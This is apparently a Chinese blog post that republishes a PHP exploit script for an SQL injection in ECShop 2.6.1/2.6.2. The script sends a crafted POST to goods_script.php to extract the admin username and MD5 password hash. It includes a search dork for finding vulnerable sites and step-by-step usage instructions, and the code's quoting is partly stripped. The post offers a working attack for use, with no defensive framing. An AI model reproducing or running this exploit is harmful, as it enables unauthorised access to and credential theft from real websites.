Qglfnts Blog
影响ECSHOP2.6.1/2.6.2版本EXP:#!/usr/bin/php<?phpprint_r(+—————————————————————————+ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploitby puret_tmail: puretot at gmail dot comteam: http://www.esunk.cndork: "Powered by ECShop"+—————————————————————————+);/*** works with register_globals = On*/if ($argc < 3) {print_r(+—————————————————————————+Usage: php .$argv[0]. host pathhost: target server (ip/hostname)path: path to ecshopExample:php .$argv[0]. localhost /ecshop/+—————————————————————————+);exit;}error_reporting(7);ini_set(max_execution_time, 0);$host = $argv[1];$path = $argv[2];$resp = send();preg_match(#href="([S]+):([a-z0-9]{32})"#, $resp, $hash);if ($hash)exit("Expoilt Success!admin:$hash[1]Password(md5):$hash[2]");elseexit("Exploit Failed!");function send(){global $host, $path;$cmd = sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x.bin2hex(all). LIMIT 1#;$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1";$data .= "Accept: */*";$data .= "Accept-Language: zh-cn";$data .= "Content-Type: application/x-www-form-urlencoded";$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)";$data .= "Host: $host";$data .= "Content-Length: ".strlen($cmd)."";$data .= "Connection: Close";$data .= $cmd;$fp = fsockopen($host, 80);fputs($fp, $data);$resp = ;while ($fp && !feof($fp))$resp .= fread($fp, 1024);return $resp;}?>把以上代码保存为php格式,如 1.php利用格式:php.exe 1.php host 网站目录路径,一般网站目录都位于根目录,所以网站目录路径写为/
积极思考造成积极人生,消极思考造成消极人生。